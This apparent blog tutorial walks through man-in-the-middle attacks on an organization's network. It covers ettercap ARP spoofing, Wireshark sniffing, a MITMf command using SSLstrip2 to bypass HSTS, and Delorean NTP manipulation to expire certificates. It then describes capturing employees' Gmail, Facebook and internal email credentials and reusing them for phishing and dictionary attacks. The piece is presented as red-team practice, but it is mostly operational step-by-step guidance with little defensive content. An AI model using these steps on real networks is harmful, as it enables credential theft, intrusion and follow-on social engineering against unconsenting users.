Man In The Middle (MITM): Capturing Credentials with SSLStrip2 and Delorean
Introduction and Objectives
This attack, as its name suggests, involves positioning oneself in the middle of the data transmission between the machines that make up the network and the router. Its main objective is espionage, capturing sensitive data that flows through the network, obtaining access credentials to devices and user accounts for potential privilege escalation, conducting subsequent phishing attacks by knowing the websites that organization users frequently visit, using a “remote browser” attack, among many other intriguing activities.
Initially, we will use basic auditing tools to conduct an attack of this kind. These tools are “ettercap” and “Wireshark”. With “ettercap,” we will first launch an “ARP Spoofing” attack to poison the “ARP tables” and position ourselves in the middle of the communications established between the organization’s machines and the router.
We will complement this credential-capturing attack with plugins such as “remote browser,” which helps us discover the websites visited by victim machines, or “DNS Spoofing,” which redirects victims to websites prepared by the attacker for information theft via phishing or automatic malware downloads, as we saw in the article dedicated to “Evilgrade.” At this point, we will also explore a more advanced attack on HTTPS using SSLstrip2, directly utilizing the “MITMf” (Man In The Middle Framework).
Running MITM with Ettercap
a) Configuring “Ettercap”
Before launching “Ettercap,” you need to configure the “etter.conf” file appropriately as shown below:
b) Starting “Ettercap”
Once you’ve made the previous changes, you can proceed to start “ettercap.” Select your wireless network interface and perform a scan of the hosts on your network. Enter the gateway IP address in “target 1” and the victim hosts in “target 2.” Go to the “Mitm” tab and choose “arp Spoofing” with the parameter “Sniff remote connections.” Accept the settings and start the attack by clicking “Start sniffing.” At this point, the MITM attack with network poisoning has begun. Concurrently, launch “Wireshark” to capture network traffic and have real-time Situational Awareness of what’s happening in the environment.
After the MITM attack has started, you can inject the “autoadd” plugin. This plugin automatically adds new machines that connect to the network.
As we mentioned before, after configuring “ettercap” for data capture on the network, we proceed to run “Wireshark” simultaneously. This allows us to observe the surrounding environment and gain a broader perspective.
d) Capturing Credentials
The waiting time for capturing credentials can vary significantly depending on various factors. However, in a network environment such as an organization where employees are consistently connected, it won’t take long for the capture of sensitive data to begin.
As we can see, in a short amount of time, we have obtained access credentials for Gmail, Hotmail, the organization’s internal email system, surveillance camera access through a No-IP link, and more.
It’s important to note that many of these credentials might also be used for accessing social media accounts such as Facebook or Twitter.
With all these newly acquired credentials, an attacker could create a dictionary for potential attacks on services running within the organization’s systems. Similarly, the attacker could launch phishing attacks via emails, requesting password renewals for specific organization services, using an email address for which they have captured credentials and that appears trustworthy.
In essence, with this simple attack, an attacker would have the means to create various attack vectors that could seriously harm the organization.
e) Capturing sensitive information to create attack vectors
Furthermore, as mentioned earlier, if we use the “remote browser” plugin, we can see which websites the company’s machines are visiting. With this information, we can program a social engineering phishing attack vector using tools like “SET” or an “auto-download” attack through system updates using “Evilgrade,” for instance.
f) Considerations to Keep in Mind
Up to this point, we have seen how to carry out the most basic MITM attack. In this way, we have captured valuable information that can be used to create new attack vectors in later exploitation stages. However, anyone who has experienced an attack like the one described above knows very well that its effectiveness depends a lot on the target system.
For instance, if the attack is directed towards an updated and well-patched Windows system, we will notice that when trying to access websites like “Hotmail,” “Gmail,” or “Facebook,” which use “https” for security, we receive a security warning indicating problems with the “https” certificates. This warning alerts us to the presence of a possible attacker sniffing the network traffic.
These security warnings pose a significant challenge when conducting these types of attacks in Red Team Operations, as a user who is even slightly knowledgeable about network security will raise the alarm within the organization, leading to the detection of our activity. However, the situation is different for services that exclusively use the “http” protocol, as the transmitted information travels in plain text and can be captured by the sniffer without any issues, similar to when using “Netcat.”
Nevertheless, there is a way to bypass the automatic “HTTPS” security imposed by the “HSTS” (HTTP Strict Transport Security) protocol. HSTS essentially enforces secure “https” connections between browsers and web servers to ensure proper data transmission between client and server. Next, we will attempt a practice session to evade “HSTS” and capture unencrypted network traffic.
Running MITM with SSLStrip2 and Delorean
a) Presentation and Launch of MITMf
The framework we are going to use in this demonstration to perform the “HTTPS bypass” is called “MITMf” (Man In The Middle Framework), which consists of a toolkit that enables various coordinated attacks including “ARP Spoofing”, “DNS Spoofing”, and “SSLstrip2” for evading encrypted HTTPS connections.
To proceed with the attack, we launch “mitmf.py” with the following configuration:
- “Mitmf.py -i <interfaz> – -spoof – -hsts – -arp – -dns – -gateway <puertaenlace> – -target <IP>”
Once the above command is executed, we are already positioned in the middle of the data transmissions on the organization’s network, capturing both plaintext and encrypted credentials.
b) Launching “Delorean” to expire certificates
It’s also advisable to launch the tool “delorean.py,” developed by “José Selvi,” which serves to modify the system’s date through the manipulation of the Network Time Protocol (NTP). This action causes HTTPS certificates to expire. The purpose of this tool is to ensure that the system doesn’t use HTTPS but rather HTTP, thereby transmitting all data in plaintext under an insecure protocol.
However, it’s important to note that to successfully modify the system’s date, it must request synchronization with the network. This process can encounter some challenges. For UNIX-type systems like Linux Ubuntu or Fedora, there are fewer issues since they make synchronization requests upon entering the network or when rebooted (in the case of Linux Ubuntu) or every minute (in the case of Linux Fedora). On the other hand, Windows systems pose more difficulties. They not only take days to make synchronization requests, but also reject requests with significant time discrepancies. This leaves a narrow window of opportunity for manipulation.
While not directly applicable to this work, it’s worth mentioning that OS X systems don’t encounter significant complications, as synchronization requests occur every few minutes, depending on the system’s load.
In summary, within a certain timeframe—dependent on the operating system—when a machine connects to a network where “delorean.py” is active, its system date can be maliciously modified to execute an attack on the HSTS protocol, as previously explained.
Here, we can see how launching the tool intercepts NTP (Network Time Protocol) requests from connected machines, subsequently altering their system dates.
As a curiosity, if you encounter the following error when running “delorean.py,” it’s because the tool requires you to terminate the “ntpd” (Network Time Protocol Daemon) process before it can execute properly. The “ntpd” process is responsible for time synchronization on the network. You should kill this process before starting “delorean.py,” as the latter will attempt to make alterations to the NTP protocol, aiming to modify system dates through network synchronizations.
Once the error appears, you simply need to navigate to your processes using the command “ps -A” and find the PID (Process ID) of the “ntpd” process. Once you’ve located it, you can terminate it using the “kill PID” command. After that, you should be able to execute “delorean.py” without any issues.
Capturing HTTPS Credentials
At this point, with both “MITMf” and “delorean.py” running, the victim’s credentials are exposed to potential theft. As seen below, when accessing a login page for services like “Gmail,” the security provided by the “HSTS” protocol has been bypassed. Instead of connecting through “HTTPS,” the connection is made directly through “HTTP.”
Therefore, we can now observe how, when connecting to websites like “Gmail” or “Facebook,” or any site that requires HTTPS, the security provided by HTTPS is bypassed, and the intercepted credentials are exposed:
In this way, we have obtained credentials from “Gmail” and “Facebook,” among others, belonging to members of the organization. These credentials can be used to launch social engineering attack vectors with a high level of trust.
If you liked it, or found this article useful, you can treat us to a warm crypto-coffee 😉